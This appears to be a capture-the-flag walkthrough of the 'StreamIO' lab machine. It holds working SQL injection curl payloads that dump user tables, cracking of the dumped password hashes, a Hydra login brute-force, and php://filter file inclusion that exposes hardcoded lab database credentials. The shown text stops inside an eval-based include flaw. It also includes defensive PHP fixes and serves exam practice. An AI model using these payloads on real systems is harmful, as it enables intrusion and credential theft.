StreamIO
Completed on Sept 22, 2022
When I decided to work on this machine, I was looking for more options to practice for the OSCP. This machine was like hitting the jackpot for me: you get to practice web application attacks, lateral movement and Active Directory, and most importantly thorough enumeration. It also shows how you can move inwards from a web application all the way to Domain Admin in Active Directory.
Just like we normally do, we start by enumerating the available services and then continue the enumeration from there.
┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ sudo nmap -Pn -sS -p- --min-rate=1000 --min-parallelism=100 -T5 10.129.167.113 -oA StreamIO
[sudo] password for kali:
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-12 23:21 EDT
Nmap scan report for 10.129.167.113
Host is up (0.16s latency).
Not shown: 65517 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
443/tcp open https
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
49667/tcp open unknown
49677/tcp open unknown
49678/tcp open unknown
49708/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 131.36 seconds
┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ PORTS=$(cat StreamIO.nmap | grep open | awk -F "\/.*" '{print $1}' | sort -u | xargs | tr ' ' ',')
awk: warning: escape sequence `\/' treated as plain `/'
┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ sudo nmap -Pn -sS -sC -sV -p $PORTS --min-rate=1000 --min-parallelism=100 -T5 10.129.167.113 -oA StreamIO-PortScan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-12 23:23 EDT
Nmap scan report for 10.129.167.113
Host is up (0.15s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-09-13 10:24:02Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: streamIO.htb0., Site: Default-First-Site-Name)
443/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| tls-alpn:
|_ http/1.1
|_http-title: Not Found
| ssl-cert: Subject: commonName=streamIO/countryName=EU
| Subject Alternative Name: DNS:streamIO.htb, DNS:watch.streamIO.htb
| Not valid before: 2022-02-22T07:03:28
|_Not valid after: 2022-03-24T07:03:28
|_ssl-date: 2022-09-13T10:25:34+00:00; +7h00m00s from scanner time.
|_http-server-header: Microsoft-HTTPAPI/2.0
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: streamIO.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49677/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49678/tcp open msrpc Microsoft Windows RPC
49708/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2022-09-13T10:24:55
|_ start_date: N/A
|_clock-skew: mean: 7h00m00s, deviation: 0s, median: 6h59m59s
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 100.85 seconds
[1] 206000 segmentation fault sudo nmap -Pn -sS -sC -sV -p $PORTS --min-rate=1000 --min-parallelism=100 -T5
From the service enumeration, we get the following hosts which will be added to our hosts file:
streamIO.htb
watch.streamIO.htb
Moving forward with the service enumeration, we would like to see what's available to us through LDAP, but chances are you need to authenticate first.
┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ ldapsearch -x -H ldap://streamio.htb:389 -D '' -w '' -b 'DC=streamio,DC=htb'
# extended LDIF
#
# LDAPv3
# base <DC=streamio,DC=htb> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#
# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A5C, comment: In order to perform this opera
tion a successful bind must be completed on the connection., data 0, v4563
# numResponses:
Not much without credentials, but the rootDSE can still be queried anonymously for some basic information about the domain:
┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ ldapsearch -x -H ldap://streamio.htb:389 -x -s base -b '' "(objectClass=*)" "*" +
# extended LDIF
#
# LDAPv3
# base <> with scope baseObject
# filter: (objectClass=*)
# requesting: * +
#
#
dn:
domainFunctionality: 7
forestFunctionality: 7
domainControllerFunctionality: 7
rootDomainNamingContext: DC=streamIO,DC=htb
ldapServiceName: streamIO.htb:dc$@STREAMIO.HTB
isGlobalCatalogReady: TRUE
supportedSASLMechanisms: GSSAPI
supportedSASLMechanisms: GSS-SPNEGO
supportedSASLMechanisms: EXTERNAL
supportedSASLMechanisms: DIGEST-MD5
supportedLDAPVersion: 3
supportedLDAPVersion: 2
supportedLDAPPolicies: MaxPoolThreads
supportedLDAPPolicies: MaxPercentDirSyncRequests
supportedLDAPPolicies: MaxDatagramRecv
supportedLDAPPolicies: MaxReceiveBuffer
supportedLDAPPolicies: InitRecvTimeout
supportedLDAPPolicies: MaxConnections
supportedLDAPPolicies: MaxConnIdleTime
supportedLDAPPolicies: MaxPageSize
supportedLDAPPolicies: MaxBatchReturnMessages
supportedLDAPPolicies: MaxQueryDuration
supportedLDAPPolicies: MaxDirSyncDuration
supportedLDAPPolicies: MaxTempTableSize
supportedLDAPPolicies: MaxResultSetSize
supportedLDAPPolicies: MinResultSets
supportedLDAPPolicies: MaxResultSetsPerConn
supportedLDAPPolicies: MaxNotificationPerConn
supportedLDAPPolicies: MaxValRange
supportedLDAPPolicies: MaxValRangeTransitive
supportedLDAPPolicies: ThreadMemoryLimit
supportedLDAPPolicies: SystemMemoryLimitPercent
supportedControl: 1.2.840.113556.1.4.319
supportedControl: 1.2.840.113556.1.4.801
supportedControl: 1.2.840.113556.1.4.473
supportedControl: 1.2.840.113556.1.4.528
supportedControl: 1.2.840.113556.1.4.417
supportedControl: 1.2.840.113556.1.4.619
supportedControl: 1.2.840.113556.1.4.841
supportedControl: 1.2.840.113556.1.4.529
supportedControl: 1.2.840.113556.1.4.805
supportedControl: 1.2.840.113556.1.4.521
supportedControl: 1.2.840.113556.1.4.970
supportedControl: 1.2.840.113556.1.4.1338
supportedControl: 1.2.840.113556.1.4.474
supportedControl: 1.2.840.113556.1.4.1339
supportedControl: 1.2.840.113556.1.4.1340
supportedControl: 1.2.840.113556.1.4.1413
supportedControl: 2.16.840.1.113730.3.4.9
supportedControl: 2.16.840.1.113730.3.4.10
supportedControl: 1.2.840.113556.1.4.1504
supportedControl: 1.2.840.113556.1.4.1852
supportedControl: 1.2.840.113556.1.4.802
supportedControl: 1.2.840.113556.1.4.1907
supportedControl: 1.2.840.113556.1.4.1948
supportedControl: 1.2.840.113556.1.4.1974
supportedControl: 1.2.840.113556.1.4.1341
supportedControl: 1.2.840.113556.1.4.2026
supportedControl: 1.2.840.113556.1.4.2064
supportedControl: 1.2.840.113556.1.4.2065
supportedControl: 1.2.840.113556.1.4.2066
supportedControl: 1.2.840.113556.1.4.2090
supportedControl: 1.2.840.113556.1.4.2205
supportedControl: 1.2.840.113556.1.4.2204
supportedControl: 1.2.840.113556.1.4.2206
supportedControl: 1.2.840.113556.1.4.2211
supportedControl: 1.2.840.113556.1.4.2239
supportedControl: 1.2.840.113556.1.4.2255
supportedControl: 1.2.840.113556.1.4.2256
supportedControl: 1.2.840.113556.1.4.2309
supportedControl: 1.2.840.113556.1.4.2330
supportedControl: 1.2.840.113556.1.4.2354
supportedCapabilities: 1.2.840.113556.1.4.800
supportedCapabilities: 1.2.840.113556.1.4.1670
supportedCapabilities: 1.2.840.113556.1.4.1791
supportedCapabilities: 1.2.840.113556.1.4.1935
supportedCapabilities: 1.2.840.113556.1.4.2080
supportedCapabilities: 1.2.840.113556.1.4.2237
subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=streamIO,DC=htb
serverName: CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configurat
ion,DC=streamIO,DC=htb
schemaNamingContext: CN=Schema,CN=Configuration,DC=streamIO,DC=htb
namingContexts: DC=streamIO,DC=htb
namingContexts: CN=Configuration,DC=streamIO,DC=htb
namingContexts: CN=Schema,CN=Configuration,DC=streamIO,DC=htb
namingContexts: DC=DomainDnsZones,DC=streamIO,DC=htb
namingContexts: DC=ForestDnsZones,DC=streamIO,DC=htb
isSynchronized: TRUE
highestCommittedUSN: 147565
dsServiceName: CN=NTDS Settings,CN=DC,CN=Servers,CN=Default-First-Site-Name,CN
=Sites,CN=Configuration,DC=streamIO,DC=htb
dnsHostName: DC.streamIO.htb
defaultNamingContext: DC=streamIO,DC=htb
currentTime: 20220913103319.0Z
configurationNamingContext: CN=Configuration,DC=streamIO,DC=htb
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
This part of the enumeration is self-explanatory: we need to understand what the applications do and then try to find our way in.
While enumerating, we find an email address with the same domain we already saw in our nmap scan and then while enumerating LDAP:
We also have Barry and Samantha as potential users of the environment, as they are listed as StreamIO employees:
While enumerating pages and directories, we found a login page at /login.php:
It also links to a /register.php page, which we used to create an account, but the new account did not work when we tested it. So we need to enumerate the pages and directories of both URLs to learn more about them.
streamio.htb:
┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ gobuster dir -u 'https://streamio.htb/' -k -w /opt/seclists/Discovery/Web-Content/big.txt -r -b 404 -t 20 --timeout 60s --wildcard -x .php,.log,.html 2> /dev/null
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: https://streamio.htb/
[+] Method: GET
[+] Threads: 20
[+] Wordlist: /opt/seclists/Discovery/Web-Content/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php,log,html
[+] Follow Redirect: true
[+] Timeout: 1m0s
===============================================================
2022/09/13 16:11:55 Starting gobuster in directory enumeration mode
===============================================================
/Admin (Status: 403) [Size: 18]
/ADMIN (Status: 403) [Size: 18]
/About.php (Status: 200) [Size: 7825]
/Contact.php (Status: 200) [Size: 6434]
/Images (Status: 403) [Size: 1233]
/Index.php (Status: 200) [Size: 13497]
/Login.php (Status: 200) [Size: 4145]
/about.php (Status: 200) [Size: 7825]
/admin (Status: 403) [Size: 18]
/contact.php (Status: 200) [Size: 6434]
/css (Status: 403) [Size: 1233]
/favicon.ico (Status: 200) [Size: 1150]
/fonts (Status: 403) [Size: 1233]
/images (Status: 403) [Size: 1233]
/index.php (Status: 200) [Size: 13497]
/js (Status: 403) [Size: 1233]
/login.php (Status: 200) [Size: 4145]
/logout.php (Status: 200) [Size: 13497]
/register.php (Status: 200) [Size: 4500]
===============================================================
2022/09/13 16:24:37 Finished
===============================================================
watch.streamio.htb:
┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ gobuster dir -u 'https://watch.streamio.htb/' -k -w /opt/seclists/Discovery/Web-Content/big.txt -r -b 404 -t 20 --timeout 60s --wildcard -x .php,.log,.html 2> /dev/null
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: https://watch.streamio.htb/
[+] Method: GET
[+] Threads: 20
[+] Wordlist: /opt/seclists/Discovery/Web-Content/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php,log,html
[+] Follow Redirect: true
[+] Timeout: 1m0s
===============================================================
2022/09/13 16:12:16 Starting gobuster in directory enumeration mode
===============================================================
/Index.php (Status: 200) [Size: 2829]
/Search.php (Status: 200) [Size: 253887]
/blocked.php (Status: 200) [Size: 677]
/favicon.ico (Status: 200) [Size: 1150]
/index.php (Status: 200) [Size: 2829]
/search.php (Status: 200) [Size: 253887]
/static (Status: 403) [Size: 1233]
===============================================================
2022/09/13 16:24:50 Finished
===============================================================
These pages don't lead to much, and we do have an admin directory, so let's fuzz it and see what's inside if anything:
┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ wfuzz -c -z file,/opt/seclists/Discovery/Web-Content/big.txt -u "https://streamio.htb/admin/FUZZ.php" --hc 404 --hl 0
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: https://streamio.htb/admin/FUZZ.php
Total requests: 20476
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000011469: 200 1 L 6 W 58 Ch "master"
Total time: 317.6052
Processed Requests: 20476
Filtered Requests: 20475
Requests/sec.: 64.46996
When accessing this page:
We will see later that this is a clue about what we will have to do, or use.
Performing a basic test using: summer' OR 1=1--
Union-based SQLi test: summer' UNION SELECT 1--
Even though it did not throw an error and we were not redirected, we retrieved no data. It is possible this is a true positive for union-based SQLi.
Attempting to get the number of columns in the table:
From the multiple tests we performed, we were able to determine the table has 6 columns and we can retrieve data through the second one which is possibly a VARCHAR type column.
Query: summer' UNION SELECT 1,(SELECT @@version),1,1,1,1--
Retrieving the system user the database is running as:
Query: summer' UNION SELECT 1,(SELECT system_user),1,1,1,1--
Retrieving list of databases:
Query: summer' UNION SELECT 1,(SELECT db_name(N)),1,1,1,1--
┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ for num in {1..10}; do \
curl -sLkX POST --url "https://watch.streamio.htb/search.php" --data-urlencode "q=summer' UNION SELECT 1,(SELECT db_name(${num})),1,1,1,1--" | grep -m 1 -oP '<h5 class="p-2">(.*)</h5>'; \
done | sed 's/<.*>\(.*\)<\/.*>/\1/'
master
tempdb
model
msdb
STREAMIO
streamio_backup
Retrieving the list of tables in the STREAMIO database, using STRING_AGG to return the list on a single line:
┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ curl -sLkX POST --url "https://watch.streamio.htb/search.php" --data-urlencode "q=summer' UNION SELECT 1,(SELECT STRING_AGG(name,',') FROM STREAMIO..sysobjects WHERE xtype = 'U'),1,1,1,1--" | grep -m 1 -oP '<h5 class="p-2">(.*)</h5>' | sed 's/<.*>\(.*\)<\/.*>/\1/'
movies,users
Retrieving the list of columns in the STREAMIO..users table, again using STRING_AGG to return the list on a single line (the query runs against the current database, STREAMIO):
┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ curl -sLkX POST --url "https://watch.streamio.htb/search.php" --data-urlencode "q=summer' UNION SELECT 1,(SELECT STRING_AGG(name,',') FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'users')),1,1,1,1--" | grep -m 1 -oP '<h5 class="p-2">(.*)</h5>' | sed 's/<.*>\(.*\)<\/.*>/\1/'
id,is_staff,password,username
Retrieving the username, password and is_staff content of the STREAMIO..users table, using STRING_AGG and CONCAT to return everything on a single line:
┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ curl -sLkX POST --url "https://watch.streamio.htb/search.php" --data-urlencode "q=summer' UNION SELECT 1,(SELECT STRING_AGG(CONCAT(username,':',password,'/',is_staff),',') FROM STREAMIO..users),1,1,1,1--" | grep -m 1 -oP '<h5 class="p-2">(.*)</h5>' | sed 's/<.*>\(.*\)<\/.*>/\1/' | tr -d ' ' | sed 's/,/\n/g'
James:c660060492d9edcaa8332d89c99c9239/1
Theodore:925e5408ecb67aea449373d668b7359e/1
Samantha:083ffae904143c4796e464dac33c1f7d/1
Lauren:08344b85b329d7efd611b7a7743e8a09/1
William:d62be0dc82071bccc1322d64ec5b6c51/1
Sabrina:f87d3c0d6c8fd686aacc6627f1f493a5/1
Robert:f03b910e2bd0313a23fdd7575f34a694/1
Thane:3577c47eb1e12c8ba021611e1280753c/1
Carmon:35394484d89fcfdb3c5e447fe749d213/1
Barry:54c88b2dbd7b1a84012fabc1a4c73415/1
Oliver:fd78db29173a5cf701bd69027cb9bf6b/1
Michelle:b83439b16f844bd6ffe35c02fe21b3c0/1
Gloria:0cfaaaafb559f081df2befbe66686de0/1
Victoria:b22abb47a02b52d5dfa27fb0b534f693/1
Alexendra:1c2b3d8270321140e5153f6637d3ee53/1
Baxter:22ee218331afd081b0dcd8115284bae3/1
Clara:ef8f3d30a856cf166fb8215aca93e9ff/1
Barbra:3961548825e3e21df5646cafe11c6c76/1
Lenord:ee0b8a0937abd60c2882eacb2f8dc49f/1
Austin:0049ac57646627b8d7aeaccf8b6a936f/1
Garfield:8097cedd612cc37c29db152b6e9edbd3/1
Juliette:6dcd87740abb64edfa36d170f0d5450d/1
Victor:bf55e15b119860a6e6b5a164377da719/1
Lucifer:7df45a9e3de3863807c026ba48e55fb3/1
Bruno:2a4e2cf22dd8fcb45adcb91be1e22ae8/1
Diablo:ec33265e5fc8c2f1b0c137bb7b3632b5/1
Robin:dc332fb5576e9631c9dae83f194f8e70/1
Stan:384463526d288edcc95fc3701e523bc7/1
yoshihide:b779ba15cedfd22a023c4d8bcf5f2332/1
admin:665a50ac9eaa781e4f7f04199db97a11/0
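The search endpoint is injectable because the value of q is concatenated into the SQL string, which is what the UNION payloads above exploit. As an added example (not the StreamIO application's own code), here is the same search written with a parameterized sqlsrv query; the movies table's id and movie columns, the form field q and the environment variable names are assumptions.

```php
<?php
// Added example, not StreamIO's code: search.php with a parameterized query.
// Assumed: table movies has columns id and movie; the form posts field q.
// Credentials come from the environment instead of being hardcoded in the file.
$connection = array(
    "Database" => "STREAMIO",
    "UID"      => getenv('STREAMIO_DB_USER'),
    "PWD"      => getenv('STREAMIO_DB_PWD'),
);
$handle = sqlsrv_connect('(local)', $connection);
if ($handle === false) {
    http_response_code(500);
    exit('database unavailable');
}

// Escape the T-SQL LIKE metacharacters so user input cannot widen the match.
// '[' is replaced first, otherwise the brackets added for % and _ would be
// escaped a second time.
function like_pattern(string $term): string
{
    $escaped = str_replace(array('[', '%', '_'), array('[[]', '[%]', '[_]'), $term);
    return '%' . $escaped . '%';
}

$q = isset($_POST['q']) ? (string) $_POST['q'] : '';
if ($q === '' || strlen($q) > 100) {
    http_response_code(400);
    exit('bad search term');
}

// The user input is bound as a parameter: it reaches SQL Server as data, so a
// value like "summer' UNION SELECT ..." is searched for literally, never parsed.
$sql  = "SELECT id, movie FROM movies WHERE movie LIKE ?";
$stmt = sqlsrv_query($handle, $sql, array(like_pattern($q)));
if ($stmt === false) {
    error_log(print_r(sqlsrv_errors(), true)); // details go to the log, not the response
    http_response_code(500);
    exit('search failed');
}

while ($row = sqlsrv_fetch_array($stmt, SQLSRV_FETCH_ASSOC)) {
    // Encode output so a movie title cannot inject HTML into the page either.
    echo '<h5 class="p-2">' . htmlspecialchars($row['movie'], ENT_QUOTES, 'UTF-8') . "</h5>\n";
}
sqlsrv_free_stmt($stmt);
sqlsrv_close($handle);
```

With the value bound as a parameter, the column-count and STRING_AGG tricks shown above simply return no rows, and the error details that would help confirm the injection stay in the server log.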
Here, we try to crack the MD5 hashes we found in the database using John the Ripper:
┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ john --format=Raw-MD5 --wordlist=/opt/seclists/Passwords/Leaked-Databases/rockyou.txt db_users1
Using default input encoding: UTF-8
Loaded 30 password hashes with no different salts (Raw-MD5 [MD5 128/128 AVX 4x3])
Remaining 28 password hashes with no different salts
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
physics69i (Lenord)
paddpadd (admin)
66boysandgirls.. (yoshihide)
%$clara (Clara)
$monique$1991$ (Bruno)
$hadoW (Barry)
$3xybitch (Juliette)
##123a8j8w5123## (Lauren)
!?Love?!123 (Michelle)
!5psycho8! (Victoria)
10g 0:00:00:01 DONE (2022-09-21 00:47) 7.352g/s 10546Kp/s 10546Kc/s 279422KC/s filimani..*7¡Vamos!
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed.
John missed some of the hashes, so we looked the remaining ones up on CrackStation. Pairing the user and password files side by side gives:
┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ pr -m -t users passwd
Lauren ##123a8j8w5123##
Sabrina !!sabrina$
Thane highschoolmusical
Barry $hadoW
Michelle !?Love?!123
Victoria !5psycho8!
Clara %$clara
Lenord physics69i
Juliette $3xybitch
Bruno $monique$1991$
yoshihide 66boysandgirls..
admin paddpadd
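Every hash above is an unsalted MD5 of the password, which is why a wordlist and a lookup site recover most of them. As an added example (not the application's own code), this is the login routine a defender would replace it with: verify against the legacy MD5 once, then re-hash with password_hash() so the row is no longer crackable by lookup. The users table layout is the one enumerated above; the open sqlsrv connection $handle is assumed.

```php
<?php
// Added example, not StreamIO's code: replace unsalted MD5 password storage with
// password_hash(), migrating each legacy row the next time its user logs in.
// Assumed: the users table has columns id, username, password, is_staff (as
// enumerated above) and $handle is an open sqlsrv connection.

function is_legacy_md5(string $stored): bool
{
    // Legacy rows hold 32 hex chars; password_hash() output starts with "$2y$" or "$argon2".
    return (bool) preg_match('/^[0-9a-f]{32}$/i', $stored);
}

function rehash_row($handle, int $id, string $password): void
{
    $new = password_hash($password, PASSWORD_DEFAULT);
    sqlsrv_query($handle, "UPDATE users SET password = ? WHERE id = ?", array($new, $id));
}

// Returns the user's id on success, null on failure. Every branch performs a
// constant-time comparison or a full hash computation, so the response time does
// not reveal whether the username exists or which hash format the row uses.
function authenticate($handle, string $username, string $password): ?int
{
    $stmt = sqlsrv_query($handle, "SELECT id, password FROM users WHERE username = ?", array($username));
    if ($stmt === false) {
        return null;
    }
    $row = sqlsrv_fetch_array($stmt, SQLSRV_FETCH_ASSOC);
    sqlsrv_free_stmt($stmt);

    if (!$row) {
        // Unknown user: still burn one hash so timing does not reveal valid usernames.
        static $dummy = null;
        if ($dummy === null) {
            $dummy = password_hash('dummy', PASSWORD_DEFAULT);
        }
        password_verify($password, $dummy);
        return null;
    }

    if (is_legacy_md5($row['password'])) {
        if (!hash_equals(strtolower($row['password']), md5($password))) {
            return null;
        }
        // Correct password against the legacy hash: upgrade the row in place.
        rehash_row($handle, (int) $row['id'], $password);
        return (int) $row['id'];
    }

    if (!password_verify($password, $row['password'])) {
        return null;
    }
    // Keep already-migrated rows current when the default cost or algorithm changes.
    if (password_needs_rehash($row['password'], PASSWORD_DEFAULT)) {
        rehash_row($handle, (int) $row['id'], $password);
    }
    return (int) $row['id'];
}
```

Rows whose users never log in again keep their MD5 hash, so a migration like this is normally paired with a forced password reset for those accounts.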
Since we have a login page and a set of database credentials, we need to find out which of them are valid for the web application, so we test them with Hydra:
┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ hydra -L users -P passwd streamio.htb https-post-form "/login.php:username=^USER^&password=^PASS^:F=Login failed"
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-09-21 01:42:11
[DATA] max 16 tasks per 1 server, overall 16 tasks, 144 login tries (l:12/p:12), ~9 tries per task
[DATA] attacking http-post-forms://streamio.htb:443/login.php:username=^USER^&password=^PASS^:F=Login failed
[443][http-post-form] host: streamio.htb login: yoshihide password: 66boysandgirls..
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-09-21 01:42:30
Logging in as yoshihide redirects back to /login.php; browsing to /admin manually then works, since it reuses the session cookie:
The /admin page:
From its links we only see the following, but we can also fuzz the page for additional parameters:
Using wfuzz:
┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ wfuzz -c -z file,/opt/seclists/Discovery/Web-Content/big.txt -u "https://streamio.htb/admin/?FUZZ=" --hc 301,403,404 --hw 131 -b 'PHPSESSID=qrdq5raiimuql0o5jglipafr20'
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: https://streamio.htb/admin/?FUZZ=
Total requests: 20476
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000005860: 200 49 L 137 W 1712 Ch "debug"
000012080: 200 10790 L 25878 W 320235 Ch "movie"
000017116: 200 398 L 916 W 12484 Ch "staff"
000018838: 200 62 L 160 W 2073 Ch "user"
Total time: 249.3074
Processed Requests: 20476
Filtered Requests: 20472
Requests/sec.: 82.13150
This did not find 'message', which we know exists, but it did find 'debug':
If this parameter is vulnerable to Local File Inclusion, we can use it to read files from the system:
┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ wfuzz -c -z file,/opt/seclists/Fuzzing/LFI/LFI-gracefulsecurity-windows.txt -u "https://streamio.htb/admin/?debug=FUZZ" --hc 301,403,404 --hw 137 -b 'PHPSESSID=qrdq5raiimuql0o5jglipafr20'
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: https://streamio.htb/admin/?debug=FUZZ
Total requests: 235
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000044: 200 56 L 148 W 1804 Ch "C:/Windows/win.ini"
000000043: 200 70 L 273 W 2577 Ch "C:/WINDOWS/System32/drivers/etc/hosts"
000000065: 200 718 L 2664 W 46280 Ch "C:/Windows/System32/inetsrv/config/schema/ASPNET_schema.xml"
000000221: 200 76 L 307 W 3070 Ch "c:/WINDOWS/system32/drivers/etc/protocol"
000000232: 200 53 L 168 W 1988 Ch "c:/WINDOWS/WindowsUpdate.log"
000000220: 200 65 L 190 W 2119 Ch "c:/WINDOWS/system32/drivers/etc/networks"
000000222: 200 336 L 1383 W 19347 Ch "c:/WINDOWS/system32/drivers/etc/services"
000000218: 200 70 L 273 W 2577 Ch "c:/WINDOWS/system32/drivers/etc/hosts"
000000219: 200 128 L 720 W 5395 Ch "c:/WINDOWS/system32/drivers/etc/lmhosts.sam"
Total time: 3.482762
Processed Requests: 235
Filtered Requests: 226
Requests/sec.: 67.47517
Using the first result as an example shows this parameter can be used for Local File Inclusion.
Let's attempt to find PHP or other files in the current directory of the application:
┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ wfuzz -c -z file,/opt/seclists/Discovery/Web-Content/dirsearch.txt -u "https://streamio.htb/admin/?debug=FUZZ" --hc 301,403,404 --hw 137 -b 'PHPSESSID=qrdq5raiimuql0o5jglipafr20'
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: https://streamio.htb/admin/?debug=FUZZ
Total requests: 12938
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000007006: 200 46 L 136 W 1693 Ch "index.php"
Total time: 163.6831
Processed Requests: 12938
Filtered Requests: 12937
Requests/sec.: 79.04295
Including index.php returns an error message, most probably because the web server is not able to interpret the file or access to it is restricted. We can base64-encode the file through a PHP stream filter wrapper and retrieve its content that way:
Using -> php://filter/convert.base64-encode/resource=
┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ curl -sLkX GET --url 'https://streamio.htb/admin/?debug=php://filter/convert.base64-encode/resource=index.php' --cookie 'PHPSESSID=qrdq5raiimuql0o5jglipafr20' | grep -E 'this option is for developers only(.*)' | sed 's/\t\t\(.*\)<\/.*>/\1/' | sed 's/\tthis option is for developers only//g' | base64 -d
<?php
define('included',true);
session_start();
if(!isset($_SESSION['admin']))
{
header('HTTP/1.1 403 Forbidden');
die("<h1>FORBIDDEN</h1>");
}
$connection = array("Database"=>"STREAMIO", "UID" => "db_admin", "PWD" => 'B1@hx31234567890');
$handle = sqlsrv_connect('(local)',$connection);
?>
<!DOCTYPE html>
<html>
<head>
...
</head>
<body>
...
</body>
</html>base64: invalid input
Even though we truncated the output, on line 11 you can see the database connection with hardcoded credentials: db_admin:B1@hx31234567890
Retrieving the contents of /admin/master.php, which we accessed earlier:
┌──(kali 👿 kali)-[~/…/StreamIO]
└─$ curl -sLkX GET --url 'https://streamio.htb/admin/?debug=php://filter/convert.base64-encode/resource=master.php' --cookie 'PHPSESSID=qrdq5raiimuql0o5jglipafr20' | grep -E 'this option is for developers only(.*)' | sed 's/\t\t\(.*\)<\/.*>/\1/' | sed 's/\tthis option is for developers only//g' | base64 -d
<h1>Movie managment</h1>
<?php
...
?>
<div>
<div class="form-control" style="height: 3rem;">
<h4 style="float:left;"><?php echo $row['movie']; ?></h4>
<div style="float:right;padding-right: 25px;">
<form method="POST" action="?movie=">
<input type="hidden" name="movie_id" value="<?php echo $row['id']; ?>">
<input type="submit" class="btn btn-sm btn-primary" value="Delete">
</form>
</div>
</div>
</div>
<?php
} # while end
?>
<br><hr><br>
<h1>Staff managment</h1>
<?php
...
} # while end
?>
<br><hr><br>
<form method="POST">
<input name="include" hidden>
</form>
<?php
if(isset($_POST['include']))
{
if($_POST['include'] !== "index.php" )
eval(file_get_contents($_POST['include']));
else
